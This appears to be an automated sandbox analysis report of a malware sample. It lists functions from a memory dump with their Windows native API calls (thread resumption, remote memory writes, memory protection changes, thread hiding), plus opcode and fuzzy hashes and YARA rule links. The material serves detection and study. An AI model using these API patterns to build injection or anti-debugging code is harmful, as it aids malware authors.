API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ac52919c5650a4b318c87b5fcedf4950b6b5b474b14b33b4cd2e695b655e8bc5
Instruction ID: 54bfffea19473c5202bf2490f85db336dd0a38abad6628d8091938c5e495193e
Opcode Fuzzy Hash: ac52919c5650a4b318c87b5fcedf4950b6b5b474b14b33b4cd2e695b655e8bc5
Instruction Fuzzy Hash: B6312D3DA88286DEFF2C4E14C9543B8326AEFFA321FB6416DD827A6195D374D484C641

Uniqueness

Uniqueness Score: -1.00%

Function 021C5F93, Relevance: 1.6, APIs: 1, Instructions: 120nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 37d885d5acd90fefb661437c6369291baf8398565800f0bd48a8ca7a24ddc6d9
Instruction ID: c87ea360b433ddcf4d56bf88795ba4a1981a292c6880adafcdf5d04b0fb64808
Opcode Fuzzy Hash: 37d885d5acd90fefb661437c6369291baf8398565800f0bd48a8ca7a24ddc6d9
Instruction Fuzzy Hash: 67315E3DA88286DEFF2C4E14C9443B8326AEFF6321FB6416DD827A6195D334D484C641

Uniqueness

Uniqueness Score: -1.00%

Function 021C5FAB, Relevance: 1.6, APIs: 1, Instructions: 117nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5a98bd72ea1d55271c46a3cf8fd8df010e2243f8680b0116f782bac748db2fcd
Instruction ID: 8be1cb0840245649934e1ce096775bd7ae83994869db116302b57fe8b7a2a111
Opcode Fuzzy Hash: 5a98bd72ea1d55271c46a3cf8fd8df010e2243f8680b0116f782bac748db2fcd
Instruction Fuzzy Hash: 5B314C3DA88286DEFF2C4E14C9483B836AAAFF6321FB6416DD827A7195D374D4C4C641

Uniqueness

Uniqueness Score: -1.00%

Function 021C5FED, Relevance: 1.6, APIs: 1, Instructions: 116nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: aa6dbbeb3844e8114596e47cb90cf72d584a98f11e2dc35f6eeb569b02f429d9
Instruction ID: 3d30f812b4923a24cb4a3cbf3aff9a2a21427f0affb2bcf4ee773f40c0636026
Opcode Fuzzy Hash: aa6dbbeb3844e8114596e47cb90cf72d584a98f11e2dc35f6eeb569b02f429d9
Instruction Fuzzy Hash: FC31493DA88286DEFF2C4E14C9483B8326AEBF6321FB6416DD827A7195D374D484C641

Uniqueness

Uniqueness Score: -1.00%

Function 021C5FC3, Relevance: 1.6, APIs: 1, Instructions: 114nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 842a992b642f1d88429eb01171f22d8592754ee56a131379c789b92282485346
Instruction ID: 2585193d9cf9b093dd7374343e3c7fccc74a7d629421a56b7adc06413809f4f9
Opcode Fuzzy Hash: 842a992b642f1d88429eb01171f22d8592754ee56a131379c789b92282485346
Instruction Fuzzy Hash: 1431493DA88182DEFF2C4E14C9483B83669ABFA321FB6416DD827A7199D334C4C4C641

Uniqueness

Uniqueness Score: -1.00%

Function 021C5FB9, Relevance: 1.6, APIs: 1, Instructions: 112nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0d6b9013832c58b818184565056ed7455695eaba1d5b6203a7296e08dbb3626e
Instruction ID: 58a7b9b21d938bab1d7bf8ef7ce57820862f722f314fe0ab62e4044194026b50
Opcode Fuzzy Hash: 0d6b9013832c58b818184565056ed7455695eaba1d5b6203a7296e08dbb3626e
Instruction Fuzzy Hash: 78310B3DA881C2DEFF2C4E14C9483B87659ABFA321FB6416DD827A6199D374D4C4C641

Uniqueness

Uniqueness Score: -1.00%

Function 021C6001, Relevance: 1.6, APIs: 1, Instructions: 109nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0ceb2a7ecde86c44166f51c44a8209d4308daf403612cd86681fecfde4544532
Instruction ID: 27ab424b9db9571090bd12daea6e9e369b7326fb696424a529086a8541e41e0c
Opcode Fuzzy Hash: 0ceb2a7ecde86c44166f51c44a8209d4308daf403612cd86681fecfde4544532
Instruction Fuzzy Hash: 8A31F82DA881C6CEFF2C4A18C8487B87669ABFA321FBA416DD466A71D9C774C4C4C641

Uniqueness

Uniqueness Score: -1.00%

Function 021C5FEF, Relevance: 1.6, APIs: 1, Instructions: 109nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9e0bc5e1952b8b3872926ea795244502b18f101640bca4d209611039f53ac55f
Instruction ID: 56096a054f9ae3b7df14158796992af337a57366eb2c34b347b7d31a98c4a531
Opcode Fuzzy Hash: 9e0bc5e1952b8b3872926ea795244502b18f101640bca4d209611039f53ac55f
Instruction Fuzzy Hash: CB312B3DA881C2CEFF2C4E14C9483B47659ABF6321FB6416DD867A7199D374C4C4C642

Uniqueness

Uniqueness Score: -1.00%

Function 021C26A7, Relevance: 1.6, APIs: 1, Instructions: 101sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 34841457ce0d100d3fdb2edf4acebc95201c3322282a1898e8acaa7227c17c0b
Instruction ID: abbb8c5d0a7cadb55341eed61a2f80f2f4a0dea69f5b11eddb339752c9a594e0
Opcode Fuzzy Hash: 34841457ce0d100d3fdb2edf4acebc95201c3322282a1898e8acaa7227c17c0b
Instruction Fuzzy Hash: D2310478284209AFEF292E20DCC0BED7AA7FF28310F65413DFD5562190C77958D8CA42

Uniqueness

Uniqueness Score: -1.00%

Function 021C6031, Relevance: 1.6, APIs: 1, Instructions: 99nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4fff6f84216c667234afddfa266185be915f17514f3b22a39a809a99683d3f6d
Instruction ID: 65756bac1e37db33dac03c0ae5b606dec770ce5a66b9229780486fb1bc60dd56
Opcode Fuzzy Hash: 4fff6f84216c667234afddfa266185be915f17514f3b22a39a809a99683d3f6d
Instruction Fuzzy Hash: AC310A2DE881C6CDFF2C4A14C9487B4766DABFA321FBA416DD426A71DAC774C4C4C641

Uniqueness

Uniqueness Score: -1.00%

Function 021C26D4, Relevance: 1.6, APIs: 1, Instructions: 95sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: a93e79662c6c40d9c4434e3fda60681548ed335f7653f31f74ecd21afe72b4dd
Instruction ID: 26dc180f1cd74badda597d2cc1973b1cea0ff19eaa972d42a37d2d69a6a87625
Opcode Fuzzy Hash: a93e79662c6c40d9c4434e3fda60681548ed335f7653f31f74ecd21afe72b4dd
Instruction Fuzzy Hash: EE314778284245AFDF2A1E24DCD0BED3BA3FF19310F65407DED85A21A1CB395898CB42

Uniqueness

Uniqueness Score: -1.00%

Function 021C602D, Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 91124f871cec7a46eda1e37287f7f1d500c854503899d6e09a12ef56de1663dd
Instruction ID: bc19febac9c4a5d8f42e72a5d2f5ce9937e5283fc9fbd7eb7e982b8e1dda7bb3
Opcode Fuzzy Hash: 91124f871cec7a46eda1e37287f7f1d500c854503899d6e09a12ef56de1663dd
Instruction Fuzzy Hash: 5D210A3DA8C1C6CEFF2D4A54C948374365DABF6321FB6416DD422A61DAC77484C4C642

Uniqueness

Uniqueness Score: -1.00%

Function 021C604A, Relevance: 1.6, APIs: 1, Instructions: 93nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 96f108486daefa6d59e733401c71ef93752ef2f6040a77d807668cf539e41fea
Instruction ID: 44e2caa11957352658d177fadedcbf1131e39a97d8d6da31c0c62252f229ea32
Opcode Fuzzy Hash: 96f108486daefa6d59e733401c71ef93752ef2f6040a77d807668cf539e41fea
Instruction Fuzzy Hash: 6231F82DA881C6CDFF294B14C8487B87669AFF6321FBA41ADD466A71AAC734C4C4C641

Uniqueness

Uniqueness Score: -1.00%

Function 021C6065, Relevance: 1.6, APIs: 1, Instructions: 90nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1c84283032b4fae86128ac7a65e52a04f94b048c952297aec4f83b313e16ae40
Instruction ID: fd0884afe7efbf3c414d223e2028fff969951475c93b693b134134ff156b34ed
Opcode Fuzzy Hash: 1c84283032b4fae86128ac7a65e52a04f94b048c952297aec4f83b313e16ae40
Instruction Fuzzy Hash: 1C21083DE881C6CDFF2C4A14CC483B87669AFFA321FBA41ADD422A619AC774C4C4C641

Uniqueness

Uniqueness Score: -1.00%

Function 021C6091, Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8a3bc6e21f4497e383735a17017571d88dee8b618216bc9c62f9fc7b25fb4aac
Instruction ID: 3152c7f14ca591f165b7e3a2bec6e4444a6d3ceb44f15bd31a8f54e09b4b187c
Opcode Fuzzy Hash: 8a3bc6e21f4497e383735a17017571d88dee8b618216bc9c62f9fc7b25fb4aac
Instruction Fuzzy Hash: C621D82DE881C6CDFF6C4A54894C3B4366DABFA315FBA446DE422A6199C734C4C4C641

Uniqueness

Uniqueness Score: -1.00%

Function 021C272D, Relevance: 1.6, APIs: 1, Instructions: 73sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: cf6a8634d166a79620e329ee4a583578711ad4999be31756b6975332a1d6ed58
Instruction ID: 56e218aa36b136602a0bebac9063652921211c60b566824e69b75bb7e3ea4073
Opcode Fuzzy Hash: cf6a8634d166a79620e329ee4a583578711ad4999be31756b6975332a1d6ed58
Instruction Fuzzy Hash: CB21D579284205AFDF291E20DC90BED7AA7BF18310FA54139EE55621A1CB3658E4DB42

Uniqueness

Uniqueness Score: -1.00%

Function 021C60BD, Relevance: 1.6, APIs: 1, Instructions: 72nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2ae1b61bb09b04ade09841c9f37e6ee8e1c0f2675db1fde331592c5cd87bc2ba
Instruction ID: a5fcedd341705c87a0ec8dbc3e5b738ecba9ffda539e262ce54e1d08b701d5d0
Opcode Fuzzy Hash: 2ae1b61bb09b04ade09841c9f37e6ee8e1c0f2675db1fde331592c5cd87bc2ba
Instruction Fuzzy Hash: 1111D62DECD2C2DDFF294A148D48374366D9FF6311FBA40AED862961AAC734C884C611

Uniqueness

Uniqueness Score: -1.00%

Function 021C274B, Relevance: 1.6, APIs: 1, Instructions: 68sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021C276F
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021C28F4

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 42dd6c3ca2372b32e95f21f2b7a6e281be04a2309f89bfc1b58d477b6a3f00e4
Instruction ID: 7fbabf8f99f2e3d3fc155af68bad46a49378c6039ae24b670cb1eb178b8c2fa3
Opcode Fuzzy Hash: 42dd6c3ca2372b32e95f21f2b7a6e281be04a2309f89bfc1b58d477b6a3f00e4
Instruction Fuzzy Hash: FB215C79284206AFDF291F20DC90BEC3AA3FF18310FA54179EE4567151C73958D4CB42

Uniqueness

Uniqueness Score: -1.00%

Function 021C60D9, Relevance: 1.6, APIs: 1, Instructions: 67nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3f0873c1e93139f70b4672b44e174036f069727522c795d40ee72d7b8da9206f
Instruction ID: dee6a612646e3fc83a311c0333b65790d7a359ef0962dce52644f86b515cfbc7
Opcode Fuzzy Hash: 3f0873c1e93139f70b4672b44e174036f069727522c795d40ee72d7b8da9206f
Instruction Fuzzy Hash: F611B22DE892C2CDFF684A18894837436699BF6315FBA40AED822A61AAC734C484C601

Uniqueness

Uniqueness Score: -1.00%

Function 021C063D, Relevance: 1.6, APIs: 1, Instructions: 66nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000051,?,?,0000FFFF,?), ref: 021C0663

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID:
API String ID: 543350213-0
Opcode ID: beaaa4d3d88c118ab10927e237df5d164740016ad89cb79e7480bb0a9eba3454
Instruction ID: a37f75f2deef9f1b5357189c4abc85562bd982c743bb42de75111016f5f35ff1
Opcode Fuzzy Hash: beaaa4d3d88c118ab10927e237df5d164740016ad89cb79e7480bb0a9eba3454
Instruction Fuzzy Hash: CB116BFC6C4325EEEF042E508CA1BE93B415F6A364F780338EC226B2C1D3A5C940CA94

Uniqueness

Uniqueness Score: -1.00%

Function 021C6129, Relevance: 1.6, APIs: 1, Instructions: 61nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5ad71f954fad4ffb27503cbfe230e8f9cf4252707ee830bb620234708806a14c
Instruction ID: 8372c978199cbddc040b9192745d95e2d4eb5c167a95147c9e431d7c858045cb
Opcode Fuzzy Hash: 5ad71f954fad4ffb27503cbfe230e8f9cf4252707ee830bb620234708806a14c
Instruction Fuzzy Hash: 9911A52DECC2C2CDFF6C5A188948374326D9BFA315FBA406ED822A6199C734C584C602

Uniqueness

Uniqueness Score: -1.00%

Function 021C6135, Relevance: 1.6, APIs: 1, Instructions: 60nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7d98fe8bbfbfb0ab0affbb6779d3259c843374dd545504ee15d027b3f626379f
Instruction ID: 4b46d441aba015f04b22e2f8f692d7e29864d0ebbe6a00cb120189b657239b04
Opcode Fuzzy Hash: 7d98fe8bbfbfb0ab0affbb6779d3259c843374dd545504ee15d027b3f626379f
Instruction Fuzzy Hash: EB11A52DECD2C2CDEF2D5A188948374366D9FF6315FBA41AED8229619AC324C584C302

Uniqueness

Uniqueness Score: -1.00%

Function 021C6160, Relevance: 1.5, APIs: 1, Instructions: 45nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8ec16d5113a199f554fb6d7faa5d5729ae58dee4ab0b193c97a5fbd30a0f055b
Instruction ID: 9abed26e5524beaa42c1a258bfcc223175546a44f38b7e964f8df0b3537e0c63
Opcode Fuzzy Hash: 8ec16d5113a199f554fb6d7faa5d5729ae58dee4ab0b193c97a5fbd30a0f055b
Instruction Fuzzy Hash: 22F0281CA8D1C298FF1E592889583BC765DAFE6311BFE44AC98635311ED3248948C201

Uniqueness

Uniqueness Score: -1.00%

Function 021C6177, Relevance: 1.5, APIs: 1, Instructions: 42nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e856252a4e3d2c1fb56db85935d8c4ef4f50944fb222c4b7a358b97c3694e6d0
Instruction ID: d50f19dbe1a1defa8d9a3dcf4e077f0110dee58b7b7f4ac1bfc6b292a26061a9
Opcode Fuzzy Hash: e856252a4e3d2c1fb56db85935d8c4ef4f50944fb222c4b7a358b97c3694e6d0
Instruction Fuzzy Hash: F4F0B46CA8D2C399FF1D592889883BC761EAFE6311BFE45BCDC23A211DD324C944C201

Uniqueness

Uniqueness Score: -1.00%

Function 021C61C5, Relevance: 1.5, APIs: 1, Instructions: 39nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 52182dcdb8e6e448b16d5f54ddfb78f4354a6c748507cd613c3e6a918aadc711
Instruction ID: aea98b978805b9da56a96578a1f0d17e61bbf10db667ae587d5103f9063edf1a
Opcode Fuzzy Hash: 52182dcdb8e6e448b16d5f54ddfb78f4354a6c748507cd613c3e6a918aadc711
Instruction Fuzzy Hash: A7F0822DA8D2C3D9EF2E5A188A48278725EAFF6311BB6456D98736620DD320C944C201

Uniqueness

Uniqueness Score: -1.00%

Function 021C6198, Relevance: 1.5, APIs: 1, Instructions: 37nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4acac2b48cb4350aed9631e7952effac3d59911e5e22439e17bade84d94fe5af
Instruction ID: 2801ee9aed8a76a757d8db0777cc4944df27a47030516825848b8f18b7b074b7
Opcode Fuzzy Hash: 4acac2b48cb4350aed9631e7952effac3d59911e5e22439e17bade84d94fe5af
Instruction Fuzzy Hash: 92F0A72CA8D1C399FF1E5D2489983BD7A2EAFE6211BFE45ACD8636250ED324CD44C640

Uniqueness

Uniqueness Score: -1.00%

Function 021C61F1, Relevance: 1.5, APIs: 1, Instructions: 31nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3a2ab7d03f7bd2ac662efaf4593fd6b8f96b1d97345371528c5f67e7bc64f201
Instruction ID: 6623091a392e0fef5753ec2cb65126014c8c55f6d67d1317d21a36116448a4db
Opcode Fuzzy Hash: 3a2ab7d03f7bd2ac662efaf4593fd6b8f96b1d97345371528c5f67e7bc64f201
Instruction Fuzzy Hash: 37E0922C98D2C2D9EF1E4E248A44378352EAFE6211FB6456D98336610DD361C904C251

Uniqueness

Uniqueness Score: -1.00%

Function 021C6205, Relevance: 1.5, APIs: 1, Instructions: 29nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7b8ee06575638fcfa1473302b5ab7f233de6881092d4c5828a02e30b861f2be4
Instruction ID: 6db1f3e2788b1bf7231a91f23cfc7b33591c067ccdadd6dad708632071f34ef6
Opcode Fuzzy Hash: 7b8ee06575638fcfa1473302b5ab7f233de6881092d4c5828a02e30b861f2be4
Instruction Fuzzy Hash: A2E0DF2C98C282D9EF2E49248A443B8712EAFE6311FB2857C88336220CD320C904C251

Uniqueness

Uniqueness Score: -1.00%

Function 021C61BD, Relevance: 1.5, APIs: 1, Instructions: 26nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(66C2EBD8,B8C2EBD8), ref: 021C61D2

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fa0e3663e8ae16f2e789d0838426d2e83579c4751522e05811b83d0b28ce363f
Instruction ID: 97c2a54469b231c48f7d0bf236701424054030244ef1670fe8dc8a0880602e7c
Opcode Fuzzy Hash: fa0e3663e8ae16f2e789d0838426d2e83579c4751522e05811b83d0b28ce363f
Instruction Fuzzy Hash: 18E0863C9CD1C2C9AF1D5D248A843B8312E9FF6211BB6456CCC336550CC330C944C251

Uniqueness

Uniqueness Score: -1.00%

Function 021C5B11, Relevance: 1.5, APIs: 1, Instructions: 16nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021C5614,00000040,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C5ABF

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4640db4de5c079262d7573e6ad017d9051276e1a14a1dc6682d7d3481b96b501
Instruction ID: 0719e4bc938399af9eb727e496c3010a1f8658af0b49ca5b3f836c956be68a70
Opcode Fuzzy Hash: 4640db4de5c079262d7573e6ad017d9051276e1a14a1dc6682d7d3481b96b501
Instruction Fuzzy Hash: 34D0C9B4114010BEA9299A28CE44E27777BD6E5729774C75DB062761CDC730EC4981B1

Uniqueness

Uniqueness Score: -1.00%

Function 021C5AA6, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021C5614,00000040,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C5ABF

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 021C36F0, Relevance: 1.5, APIs: 1, Instructions: 10libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(FE8166D8), ref: 021C370D

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f8f5c851736b6d0dbe868e21203c961050378d2f8e7c25c6b76686577ce046be
Instruction ID: 578226dea24ae079fb544125ebf42bc55065b5c8bd05b07887dba98eb6c8037e
Opcode Fuzzy Hash: f8f5c851736b6d0dbe868e21203c961050378d2f8e7c25c6b76686577ce046be
Instruction Fuzzy Hash: 07C09B713CA05C1DD6407276441C5DD06165BE2340BFFD455D0459F71ACF098D59BBE1

Uniqueness

Uniqueness Score: -1.00%

Function 004027ED, Relevance: 1.5, APIs: 1, Instructions: 234memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000,FFFFCC1E,-00000007), ref: 004029B3

Memory Dump Source

Source File: 00000000.00000002.595851863.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.595841703.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.595908678.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8b1551aa3eb0078be30354039193352010372f832ebc8bc24555723e10be16c8
Instruction ID: 6037a58f573b3c06bb4c0fa4f1b809fb9ec6c38b538f1cb3476e2b03d129a80a
Opcode Fuzzy Hash: 8b1551aa3eb0078be30354039193352010372f832ebc8bc24555723e10be16c8
Instruction Fuzzy Hash: FB412921B457054FD72C88BE98D4A57A183EBDF310B69F13CA61DE7799DE7C8C0A8208

Uniqueness

Uniqueness Score: -1.00%

